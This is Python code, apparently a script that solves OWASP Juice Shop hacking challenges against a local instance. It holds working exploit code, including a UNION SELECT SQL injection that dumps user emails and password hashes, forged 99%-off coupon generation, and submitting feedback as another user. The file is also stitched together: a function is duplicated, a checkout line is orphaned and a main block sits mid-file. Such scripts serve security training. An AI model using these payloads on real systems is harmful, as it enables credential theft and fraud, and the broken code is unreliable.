def solve_feedback_challenges(server):
print('\n== FEEDBACK CHALLENGES ==\n')
session = get_admin_session(server)
submit_zero_star_feedback(server, session)
submit_xss4_feedback(server, session)
inform_shop_of_problem_libraries(server, session)
submit_feedback_as_another_user(server)
delete_all_feedback(server, session)
print('\n== FEEDBACK CHALLENGES COMPLETE ==\n')
def solve_product_challenges(server):
print('\n== PRODUCT CHALLENGES ==\n')
session = get_admin_session(server)
access_another_user_basket(server, session)
order_christmas_special(server, session)
make_ourselves_rich(server, session)
update_osaft_description(server, session)
update_product_with_xss3_payload(server, session)
forge_coupon(server)
print('\n== PRODUCT CHALLENGES COMPLETE ==\n')
def solve_misc_challenges(server):
print('\n== MISC CHALLENGES ==\n')
session = get_admin_session(server)
access_score_board(server, session)
access_administration(server, session)
bypass_redirect_whitelist(server, session)
check_all_language_files(server, session)
provoke_error(server, session)
decrypt_easter_egg(server, session)
solve_challenge_99(server, session)
print('\n== MISC CHALLENGES COMPLETE ==\n')
def forge_coupon(server):
"""
Force a 99%-off coupon and checkout
:param server: juice shop URL
"""
session = get_admin_session(server)
basketid = get_current_user_id(server, session)
payload = _build_basket_payload(2, basketid, 1)
_add_to_basket(server, session, payload)
couponcode = _generate_coupon()
print('Applying forged coupon...'),
applycoupon = session.put('{}/{}/coupon/{}'.format(_get_basket_url(server),
basketid, couponcode))
if not applycoupon.ok:
raise RuntimeError('Error applying coupon code.')
_checkout(server, session, basketid)
print('Success.')
def get_users_with_sql_injection(server):
"""
Abuse UNION SELECT statement to join the users table to the products query, print out results.
Also solves logging in as admin with real credentials if unsolved yet.
:param server: juice shop URL
"""
session = get_admin_session(server)
injection = "test')) UNION SELECT NULL,email,password,NULL,NULL,NULL,NULL,NULL FROM USERS--"
users = session.get('{}/rest/product/search?q={}'.format(
server, injection))
if not users.ok:
raise RuntimeError('Error with SQLi attempt.')
print('Found email and password hashes with SQLi, printing...')
for user in users.json().get('data'):
print('Email: {}, Password hash: {}'.format(user.get('name'),
user.get('description')))
print('Done.')
def submit_feedback_as_another_user(server):
print('Submitting feedback from admin account as userid 2...'),
session = get_admin_session(server)
payload = {'comment': 'nyah nyah', 'UserId': 2}
send_feedback(server, session, payload)
print('Success.')
if not checkout.ok:
raise RuntimeError('Error checking out basket.')
def _generate_coupon():
"""
Generate coupon using current month/year
:return:
"""
now = datetime.datetime.now()
month = now.strftime('%b').upper()
year = now.strftime('%y')
return z85.encode('{month}{year}-99'.format(month=month, year=year))
def solve_product_challenges(server):
print('\n== PRODUCT CHALLENGES ==\n')
session = get_admin_session(server)
access_another_user_basket(server, session)
order_christmas_special(server, session)
make_ourselves_rich(server, session)
update_osaft_description(server, session)
update_product_with_xss3_payload(server, session)
forge_coupon(server)
print('\n== PRODUCT CHALLENGES COMPLETE ==\n')
if __name__ == '__main__':
server = 'http://localhost:3000'
session = get_admin_session(server)
order_christmas_special(server, session)
def solve_file_handling_challenges(server):
print('\n== FILE HANDLING CHALLENGES ==\n')
session = get_admin_session(server)
download_files_from_ftp(server, session)
solve_file_upload_challenges(server, session)
print('\n== FILE HANDLING CHALLENGES COMPLETE ==\n')